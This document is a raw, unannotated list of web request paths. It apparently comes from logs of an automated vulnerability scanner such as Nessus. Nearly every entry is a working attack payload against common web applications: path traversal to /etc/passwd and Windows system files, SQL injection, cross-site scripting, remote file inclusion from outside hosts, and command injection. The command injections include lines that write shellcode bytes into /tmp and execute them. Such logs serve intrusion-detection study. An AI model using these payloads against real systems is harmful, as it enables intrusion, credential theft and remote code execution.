/5o9zq43e.htm? /"consumer+information"/ /nsn/..\util/dsbrowse.bas /top.php?stuff='&uname >q61677415 # /eg2u8pbv.do? /a0imiuf1.jspa? /cgi-bin/base_local_rules.php?dir= /manager/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00 /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/hlgncmwqwx0;')."]=1 /eei78ore.mscgi? /cgi-bin/index.php?mod_id=2&kb_ask= /javascript/queue.exe /s7qus4g3.asp? /main.php?stuff=del;q53449996&rem; /ewc3rz1l.cgi? /bn857frh.asp? /zqqemp6j.cfm? /cgi-sys/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /naviconapplescript20050412/ /en-us/account/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /examples/jsp/error/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /t578vqea.fts? /scripts/sawmillcl.exe?ho+{complete_version} /cgi-bin/index.php?search=&function=search /javascript/affiliates.exe /ydexw8by.x? /examples/jsp/num/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wpypq2jh]));die;/* /script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /if69ddo1.fts? /javascript/audio.exe /scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp?? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+28+30+00+00+00+00++>>esbq /admin.php?"><" /main.php?stuff='rm q94914736 # /examples/servlets/servlet/login.php?course="> /puttputtzoo.exe/ /examples/jsp/jsp2/el/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /news.php?scriptpath=@rfiurl?scriptpath=@rfiurl? /5o9zq43e.jspa? /qczkquis.mscgi? /en-us/7o5qp766.mscgi? /cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd /h5sc3gxy.x? /xanax-description/ /hipkz026.fts? /scriptomania_v2/ /scripts/nsiislog.dll /javascript/25.exe /en-us/33y9gcqq.jspa? /more.php?id=1' /t7tm4m0b.cfc? /search-results.dot?search_query= /help.php?q="del\x09q46669995\x09# /scripts/shop.plx/page=nessus1521425795 /en-us/account/phptonuke.php?filnavn=/etc/passwd /javascript/player.exe /d765w06j.x? /jdx255ea.pl? /lostpasswd/ /javascript/sox.exe /examples/jsp/sessions/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00 /fc9t54l7.aspx? /scripts/t769qwej0llr.cfm /javascript/cgi.exe /index.php?id=yfbenmzg_m' /javascript/papers.exe /scripts/index.php?option=frontpage&itemid=2|system(id)|1331909360 /https-admserv/bin/index?/ /javascript/1001.exe /main.php?logout=' /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- /en-us/account/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd /scripts/xuicksry9grj.sh /edzaia0i.do? /examples/jsp/jsp2/jspx/popup.php?include_path=/etc/passwd\x00 /ast_description/ /9kr0ih0v.kspx? /login.php/login.php?lang=../../../../../ubbc.js\x00 /javascript/x.exe /scripts/index.php?option=frontpage&itemid=2|system(id)|1331904229 /lsoix5h3.pl? /a0imiuf1.htm? /en-us/n9xlumt5.pl? /en-us/account/popup.php?include_path=/etc/passwd\x00 /j734qobz.fts? /mpcgi/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /papert's_principle/ /javascript/active.exe /qhvu0pdg.pl? /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/tzhfyzkbomspvm?? /cgi-914/ion-p.exe?page=c:\winnt\repair\sam /xfkun1ku.kspx? /scripts/setup.php /ht8pn8uq.pl? /weq93ppb.jspa? /script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.96:8080/4dckqcc0acprbz? /recordings/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /7dbjwpw6.cfm? /examples/jsp/jsp2/el/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /javascript/signin.exe /esmozg5d.fts? /scripts/www/delivery/ac.php?bannerid=-290+or+1=1 /ddoworrl.cfm? /main.php?logout="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/hwxugbkmva" /examples/jsp/jsp2/el/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /manager/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /examples/jsp/jsp2/el/search.pl?form=../../../../../../etc/passwd\x00 /top.php?stuff="&uname >q38114689 # /examples/jsp/colors/index.php?entry=' /0rufe52p.php? /scripts/gbadmin.cgi?action=change_adminpass ftp://192.168.27.102/* /xssthreat/ /p043snfr.jspa? /webcgi/ion-p?page=../../../../../etc/passwd /jscript.php?my_ms[root]=http://192.168.202.118:8080/ghl9il?? /rbec2ohx.kspx? /javascript/htpasswd.war /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ /top.php?stuff='&uname\x09# /help.php?q=;del\x09q81281166\x09# /de3v2dd9.do? /vac1l5vm.do? /jdx255ea.jsp? /include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/moclyxlwqyfjnp? /examples/jsp/colors/activatemember?activatecode=&member="> /mv8wxfy9.cgi? /"rss+security"/ /dir_thatware/config.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz?' /8t9v8k7x.idc? /javascript/viewcvs.exe /static//\..\..\..\..\..\..\..\..\windows/win.ini /subscriptions.jhtml /scripts/listrec.pl?app=qmh-news&template=;ls /etc| /cgi-bin/js/scripts.php?load=/boot.ini\x00 /javascript/true.exe /rbec2ohx.x? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/rymojltfjq0+>+/dev/null+&'); function v /cgi-bin/test-cgi.exe? /6wb70v0b.pl? /subscriptions.cgi /gepi/gestion/savebackup.php?filename=http://cirt.net/rfiinc.txt?&cmd=cat/etc/passwd /mv8wxfy9.exe? /help.php?q="\x0adel\x09q73265631\x09# /scripts/wsnsa.dll/wservice=wsbroker1/webutil/ping.p /s7qus4g3.jspa? /i7prbs22.mscgi? /nyjgaorz.jspa? /conscript_gifts/ /cacti/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /cgi-bin/index.php?id='union/**/select/**/0,0,1673700990,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /top.php?stuff='\x0ddel q83658658 # /scripts/wxrdqnkjuwmu.html /cgi-bin/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl /h21y8w52.x? /examples/jsp/cal/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=tshujzjrl3ejhp0_3 /main.php?logout=&ver >q46544641&rem /azcrfs8d.nsf? / /javascript/22.exe /en-us/ddoworrl.cfc? /0rufe52p.fts? /examples/jsp/jsp2/el/showproduct.php?product=1' /h21y8w52.mscgi? /examples/jsp/jsp2/jspx/forumdisplay.php?fid=21"> /javascript/webdb.exe /examples/jsp/sessions/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini /examples/servlets/servlet/phptonuke.php?filnavn=/etc/passwd /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919003,1,1,1,1,1,1,1--&blogid=1 /.dll /htbin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /includes/converter.inc.php?include_path=/etc/passwd\x00 /popup.php?poll_ident= /recordings/include/sql.php?include_path=/etc/passwd\x00 /a0imiuf1.idc? /scripts/ui/login?user=nessus-1331909161 /top.php?stuff="ver\x09>q12423295&rem\x09 /manager/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00 /cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\x00 /top.php?stuff='\x0duname\x09>q88128927\x09# /scriptome/ /examples/jsp/num/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 /gy23xnjq.do? /en-us/ddoworrl.htm? /igtf0zon.exe? /vac1l5vm.x? /atlantisrebornagain_transcript/ /6qbynt4f.dll? /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/4dckqcc0acprbz?? /examples/jsp/jsp2/el/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd /cgi-bin/index.php?op=default&date=200607' union select 1,199642765,1,1,1,1,1,1,1,1--&blogid=1 /m4kkjf8l.exe? /phpmyadmin/bandwidth/index.cgi?action=showmonth&year=&month= /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00 /scripts/printenv.tmp /top.php?stuff='\x0asleep 7 # /scripts/?p=subscribe /index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl"> /scripts/n4p4f4gtbhia.cfm /examples/jsp/num/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /de3v2dd9.jsp? /examples/jsp/checkbox/calendar_admin.pl?config=|cat /etc/passwd| /manager/help/index.php?help_file=../../../../../../../../../../../etc/passwd /manager/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /odzk29aa.asp? /viewcat.php?catid=21abc'&s_itemnum=&s_user_id=&s_title=&s_description=&s_asking_min=&s_asking_max=&s_quantity=&s_city_town=&s_state_province= /zmvq66jy.asp? /nyvbv05h.nsf? /javascript/showpost.exe /rpxyx07v.idc? /main.php?stuff="&del\x0cq64367569&rem\x0c /examples/jsp/jsp2/jspx/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_jugo3scd]));die;/* /member/usercp_menu.php?script_folder=http://192.168.202.118:8080/tzhfyzkbomspvm? /cgi-bin?username="alert('base_local_rules_xss.nasl-1331904405') /examples/jsp/num?username=" /examples/jsp/sessions/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- /main.php?stuff="uname\x09>q84368944\x09# /javascript/oaerrordetailpage.exe /examples/jsp/sessions/shoutbox.php?conf=../../../../../../../../etc/passwd /cacti/mapserv.exe?map=mapserver_detect.nasl.map /top.php?stuff="ping;-w;9000;-n;1;1.2.3.4&rem; // /rpc.php?q=\"> /main.php?logout="ping,-w,7000,-n,1,4.3.2.1|rem, /examples/jsp/jsp2/jspx/index.php?entry=' /cgi-bin/index.php?id=hw828khs0f' /eventum_xss/ /examples/jsp/sessions/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /en-us/h5sc3gxy.html? /www/delivery/ac.php?bannerid=-1332008323+or+1=1+--+';passthru(base64_decode($_server[http_nessus_tbftd0nk]));die;/* /mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini /scripts/cfgwiz.exe /cgi-bin/shared/help.php?page=../../../../../../../../../../etc/passwd\x00 /cgi-bin/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/sessions/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd /examples/servlets/servlet/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /scripts/yfmo7jpwvpv1.php /help.php?q=ver\xa0>q87371136&rem\xa0 /cgi-win/r.cgi?file=../../../../../../../../../../etc/passwd /phpmyadmin/../phpmyadmin.tar.gz /examples/jsp/colors/forum_2.php?msg=10&return= /dda2qr7j.htm? /main/inc/lib/fckeditor/editor/plugins/imagemanager/editor.php?img="><" /? /examples/jsp/cal/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /scripts/rih28haesl0j.cgi /help.php?q=&del;q11223182&rem; /top.php?stuff=ver&rem; /en-us/33y9gcqq.cgi? /examples/jsp/jsp2/el/include/error/autherror.cfm?errorcode=1&ftvar_linkp="> /cgi-bin/cleartrust/ct_logon.asp?ctloginerrormsg= /tuwjta1w.exe? /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee612207409.~1~ /x7pclv4s.idc? /r3le3om5.dll? /cgi-bin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /javascript/copy.exe /scripts/login.php?url=editgedcoms.php /en-us/ /0u75ldxq.mscgi? /phpmyadminsearch-results.dot?search_query=nessus">/ /download.php?id=' /scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1990709357,1464629176,1,1,1,1,1--&blogid=1 /azcrfs8d.kspx? /nyvbv05h.asp? /examples/servlets/servlet/embed/day.php?path=/etc/passwd\x00 /javascript/youtube.exe /iv5vkgam.cfm? /examples/jsp/num/fxm.exe /6qbynt4f.php3? /top.php?stuff="ping\x0b-w\x0b9000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b /dda2qr7j.nsf? /cgi-sys/vssetcookie.exe /j4drbkil.fts? /opensiteadmin/scripts/classes/loginmanager.php?path=@rfiurl\x00 /top.php?stuff=ping;-w;9000;-n;1;4.3.2.1|rem; /5o9zq43e.html? /examples/jsp/jsp2/jspx/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\x00 /examples/jsp/num/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /scripts/h3d1n9eaqxv3.cfm /scripts/search.php /examples/jsp/sessions/index.php?search=&function=search /33y9gcqq.nsf? /xfkun1ku.pl? /clk;38417351;7163019;g/ /0u75ldxq.aspx? /6n7aacgg.do? /javascript/xxx.exe /manager/protection.php?action=logout&siteurl=/etc/passwd /examples/jsp/checkbox/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz?? /bin/htimage.exe/path/filename?2,2 /examples/servlets/servlet/data/fetch.php?page=' /cgis/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /examples/jsp/checkbox/index.cfm?fuseaction=category.display&category_id=' /javascript/includes.exe /javascript/hosting.exe /0z575z74.kspx? /main.php?stuff="ver\xa0>q33347165&rem\xa0 /iktok2bw.cgi? /8t9v8k7x.asp? /bugs/index.php?err=3&email=\"> /cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd /news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg /script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8? /miz4r5hz.php? /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /help.php?q="ping -w 11000 -n 1 4.3.2.1|rem /help.php?q='\x0ddel\x09q24981853\x09# /h5i6crm3.jspa? /egaet53a.cfm? /examples/jsp/jsp2/jspx/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /7u1pb2xi.cfm? /vjbrrppi.htm? /de3v2dd9.asp? / /zuihld5m.nsf? /en-us/account/index.cfm?fuseaction=category.display&category_id=' /htbin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /test.shtml?=x /en-us/33y9gcqq.x? /modules.php?op=modload&name=xforum&file=member&action=viewpro&member= /examples/jsp/cal/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /scripts_sitemanager/ // /scripts/ui/login?user=nessus-1331922061 /e9rx3ya4.nsf? /scripts/index.php/index.html /javascript/zimbra.exe /config.php?path[docroot]=/etc/passwd\x00 /main.php?stuff=\x0auname\x09>q82381573\x09# /ap58k3ci.pl? /top.php?stuff='&del q76213281 # /valium-prescription/ /help.php?q=&uname\x09>q36668797\x09# /javascript/embedded.exe /admin/common/script.js.php.old /txtsubscriptions/ /help.php?q=;rm\x09q17568111\x09# /cacti/way-board/way-board.cgi?db=/etc/passwd\x00 /main.php?logout='\x0asleep 9 # /supporter/tupdate.php?groupid=change&sg=' /fc9t54l7.cgi? /phpmyadmin/add_url.htm?node= /cacti/index.php?entry=' /main.php?logout='\x0auname\x09>q55586739\x09# /cgi-exe/.htpasswd /n1afe1y6.jsp? /w2kandntsecurityeventlogdescriptions/ /examples/jsp/colors/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /en-us/oie504mr.jspa? /scs86g1p.dll? /include/default_header.php?script_path=http://192.168.202.118:8080/moclyxlwqyfjnp? /o35zot2r.pl? /gy23xnjq.cfm? /javascript/gallery.exe /cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null -- /scripts/blog.php?f=&newmessage=&newremember=1&adminuser=1&newusername=php_update_var_overwrite.nasl /examples/jsp/num/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 // /scripts/1331922077-ror_session_fixation.nasl /fa8p8lr8.mscgi? /fc9t54l7.cfc? /examples/servlets/servlet/nessus">/ /javascript/buy.exe /bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/4dckqcc0acprbz? /33y9gcqq.x? /examples/servlets/servlet/a1disp3.cgi?/../../../../../../etc/passwd /scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1630321351,0,0,0,0,0-- /help.php?q="ver >q41912626&rem /en-us/account/data/fetch.php?page=' /examples/servlets/servlet/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /byrg33fw.mscgi? /javascript/lib.exe /rbec2ohx.jspa? /t578vqea.cfc? /scripts/base_local_rules.php?dir= /examples/jsp/jsp2/el/profil.php?id=1 /add_comment.php?id="><" /t3af3tdz.html? /writingscripts/ /bin/ion-p.exe?page=c:\winnt\repair\sam /scripts/calendar.php?month=' union select 1,1,'1331922100','calendarix_month_sql_injection.nasl',1 # /examples/jsp/colors/texis.exe/?-dump /javascript/pixel.exe /scriptsadmin/index.php /javascript/geeklog.exe /main.php?stuff="&ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /j734qobz.php3? /examples/jsp/sessions/viewpage.php?file=/etc/passwd /w4996nr0.fts? /h5sc3gxy.pl? /ddoworrl.pl? /scripts/qbch5ojumj32.php /en-us/account/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00 /xss_500x214/ /subscriptions.ico /lmw4r201.jspa? /..../..../..../..../..../..../..../..../..../winnt/win.ini /en-us/33y9gcqq.pl? /fpnpp5zg.php3? /main.php?stuff=;del q28712723 # /scripts/event_view.php?eid=34 union select 634727808 /cgi-bin/smpwservicescgi.exe /n1afe1y6.mscgi? /script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8? /manager/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /examples/servlets/servlet/more.php?id=1' /u8yiqilu.cfc? /lmw4r201.dll? /scriptaculous-1/ /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+68+c0+a8+ca+66+68+02+00+ce+ad+8b+dc+6a+10+53+55+ff+d0+83+c4+2c+95+59+5a+51++>>esbq /1qwv2p5p.fts? /scripts/pssdseehtgdp.shtml /v3axg1p8.mscgi? /main.php?logout="&sleep 10 # /scripts/forums.asp?ifor=duforum_sql_injections.nasl' /jscript.php?my_ms[root]=http://192.168.202.118:8080/moclyxlwqyfjnp?? /en-us/7o5qp766.pl? /dslpwt15.cgi? /cgi-sys/ppdscgi.exe /cacti/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00 /webcgi/msmmask.exe?mask=/junk334 /cgi-bin/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /examples/jsp/cal/protection.php?action=logout&siteurl=/etc/passwd /script/tick/test.php?path_to_code=http://192.168.202.118:8080/2aibfaczmac8? /recordings/perl.exe?-v /en-us/7o5qp766.php? /scripts/d3z7yywpyeoa.inc /stat/awstatstotals.php?sort="].phpinfo().exit().$a[" / /recordings/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /javascript/record.exe /administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/whmch8ftkt7kv? /jdx255ea.pl? /news/scripts/news_page.php?script_path=http://cirt.net/rfiinc.txt?? /en-us/dda2qr7j.pl? /chattranscripts/ /help.php?q=&ver\x0b>q84637493&rem\x0b /index.php?gadget=glossary&action=viewterm&term= /scripts/index.php?id='union/**/select/**/0,0,1975243928,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /hjdzm96v.html? /javascript/evil.exe /cgi-bin/starnet/addons/slideshow_full.php?album_name='55723961 /6qbynt4f.mscgi? /newsubscription/ /main.php?stuff="&sleep 8 # /en-us/ddoworrl.fts? /help.php?q="&ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /help.php?q="\x0asleep\x098\x09# /r3le3om5.exe? /cgi-bin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd /en-us/ddoworrl.x? /examples/jsp/jsp2/el/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00 /yef5f3d5.cfm? /manager/sgdynamo.exe?htname=sgdynamo.exe /sysuser/docmgr/vchist.stm?name= /hrttz9fj.cgi? /new_script-1/ /9o6g5vkn.html? /w4996nr0.cfc? /eei78ore.kspx? /vjbrrppi.cgi? /top.php?stuff="ver&rem /main.php?logout='|sleep\x098\x09# /index.php?op=default&date=200607' union select 1,1520713154,1,1,1,1,1,1,1,1--&blogid=1 /subscriptions.bat /cacti/cart32.exe /main.php?stuff=\x0auname >q63217252 # /en-us/33y9gcqq.fts? /channeldescript/ /main.php?stuff='del q73795897 # /a0imiuf1.html? /cgi-bin/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /javascript/fusion.exe /templates/prescription /addressbook.php?\"> /main.php?stuff="\x0auname\x09>q74494385\x09# /help.php?q="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\x00 /you've probably noticed this column along the side/ /cacti/index.php?cid=' /examples/jsp/sessions/admin/admin.php?sid=' /m2fpztty.cgi? /javascript/javadoc.exe /<20060312011649/ /qczkquis.idc? /t7tm4m0b.kspx? /main.php?stuff=ping;-w;11000;-n;1;1.2.3.4&rem; /fa8p8lr8.php3? /pls/help/ /manager/admin/configset.php?settings_dir=/etc/passwd\x00 /help.php?q="&ver >q86798622&rem /l4fz1dqw.x? /modules.php?letter=">&op=modload&name=members_list&file=index /82q7ywa8.asp? /examples/jsp/checkbox/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini /nyjgaorz.jsp? /top.php?stuff="|ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /9ko6m4c8.mscgi? /jw64yq8u.aspx? /5o9zq43e.dll? /en-us/ddoworrl.cgi? /if69ddo1.kspx? /lsoix5h3.htm? /scripts/shop.plx/page=nessus1384989384 /subscript_header/ /main.php?frm_daynight=day&frm_passwd=&frm_referer=q53544634&frm_user=&scr_height=&scr_width= /javascript/apple.exe /path_script/createurl.php?formurl=@rfiurl /forum.asp?n=`/etc/passwd`|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'`'. /6qbynt4f.pl? /javascript/auction.exe /cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008335','5'-- /fo564rei.jspa? /servlet/com.newatlanta.servletexec.jsp10servlet/..\..\global.asa /phpmyadmin//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /examples/jsp/error/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /hjdzm96v.aspx? /v3axg1p8.pl? /examples/jsp/cal/index.php?act=arcade&do=stats&gameid=1' /scripts/9pen4xzgztjn.cgi /orderinghydrocodonewithoutaprescription/ /examples/jsp/colors/webplus.exe?script=webplus_install_path.nasl /oie504mr.do? /javascript/icat.exe /examples/jsp/num/main.php?g2_itemid=../../../../../license\x00 /scripts/phpnews/sendtofriend.php?mid='1' /main.php?logout="rm\x0cq35989384&rem\x0c /awstats/awstats.pl?migrate=|echo;/./tmp/wrkvkjjzem0 > /dev/null &;echo|awstats726408.txt /vwmg565s.mscgi? /awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/qcywjpzuja0;echo|awstats457124.txt /examples/jsp/num/doc/index.php?s=/etc/passwd\x00 /main.php?stuff="\x0asleep\x098\x09# /javascript/htpasswd.bz2 /javascript/.passwd.nsf /main.php?stuff=&ver\x09>q57189992&rem\x09 /hjdzm96v.pl? /main.php?stuff="|ping,-w,9000,-n,1,4.3.2.1|rem, /? /admin/index.php?path_to_script=http://192.168.202.118:8080/2aibfaczmac8??&cmd=ls /examples/jsp/cal/webadmin.php?show=/etc/passwd /vmi8bb12.aspx? /help.php?q="ping,-w,11000,-n,1,4.3.2.1|rem, /examples/jsp/sessions/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /0u75ldxq.pl? /iajtej82.php? /b4vng02k.exe? /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1../../../../../../../../../../tmp /top.php?stuff="ver\x0c>q33687847&rem\x0c /phpmyadmin/admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /n1afe1y6.mscgi? /examples/jsp/jsp2/el/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /bn857frh.kspx? /javascript/images.exe /cgi-bin/index.php?page=/etc/passwd\x00 // /igtf0zon.aspx? /prescription-drugs/ /emailsubscriptionshelp/ /examples/servlets/servlet/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd /recordings/includes/converter.inc.php?include_path=/etc/passwd\x00 /ydexw8by.mscgi? /6qbynt4f.x? /javascript/usr.exe /cgi-exe/ppdscgi.exe /scripts/htsearch?-c/nonexistent /.php3 /javascript/onbound.exe /examples/jsp/checkbox/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /examples/jsp/cal/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /jamie's return to school dinners/ /o6ebbirj.do? /d765w06j.fts? /htbin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /uvazfs7p.do? /en-us/ /en-us/account/mylog.html?screen=/etc/passwd /syshelp/stmex.stm?foo= /cgi-bin/index.php?album=../../../../../../../../../../boot.ini\x00 /t3af3tdz.htm? /main.php?logout=uname\x09>q78171128\x09# /main.php?stuff=ver\xa0>q57599426&rem\xa0 /scripts/4rzefq7dsowk.asp /javascript/aliases.exe /lmw4r201.jspa? /copatranscript_20061101/ /169okeyj.php? /manager/search.pl?form=../../../../../../etc/passwd\x00 / /bt_subscription/ /e-mail_subscriptions/ /examples/jsp/jsp2/el/index.php?op=default&date=200607' union select 1,2111767763,1,1,1,1,1,1,1,1--&blogid=1 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+01+42+00+ff+d0+8b+e3+ff+d7+6a+06+6a+01+6a+02+ff+d0+8b+e8+ff+d7+6a+00+6a+00++>>ctdn /xfkun1ku.nsf? /javascript/party.exe /iisadmpwd/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir /help.php?q="ping -w 7000 -n 1 1.2.3.4|rem /help.php?q="&rm\x09q33725356&rem\x09 /script>alert('vulnerable').cfm /if69ddo1.htm? /................../config.sys /0rufe52p.cgi? /javascript/ibm.exe /chat_transcripts/ /main.php?stuff=';rm\x09q87217698\x09# /a0imiuf1.php? /lsoix5h3.x? /examples/jsp/jsp2/el/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00 /tukodz3j.php? /scripts/sensepost.exe?/c+dir /main.php?logout="\x0arm\x09q43175153\x09# /examples/jsp/colors/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /examples/jsp/jsp2/jspx/port.php?proto=tcp' /l4fz1dqw.kspx? /scripts/index.php?op=default&date=200607' union select 1,596298457,1,1,1,1,1,1,1,1--&blogid=1 /scripts/t99iadgtkf9h.cfm /main.php?stuff="rm,q37721326&rem, /y8pmygrp.html? /help.php?q="&ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /jackrabbit/search.jsp?q=%" /iajtej82.cgi? /main.php?stuff=";del\x09q87779896\x09# /qczkquis.kspx? /examples/jsp/jsp2/jspx/webadmin.php?show=/etc/passwd /descript/ /javascript/session.exe /main.php?stuff="&ping,-w,9000,-n,1,4.3.2.1&rem, /top.php?stuff='\x0drm q84295152 # /script/_conf/core/common-tpl-vars.php?confdir=http://cirt.net/rfiinc.txt?? /scripts/index.php?id='union/**/select/**/0,0,281177442,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /examples/jsp/sessions/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /edv3mapy.cfm? /javascript/l.exe /search/submit.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp? /search.jsp?q=%" /help.php?q=&ver,>q16465625&rem, /javascript/specials.exe 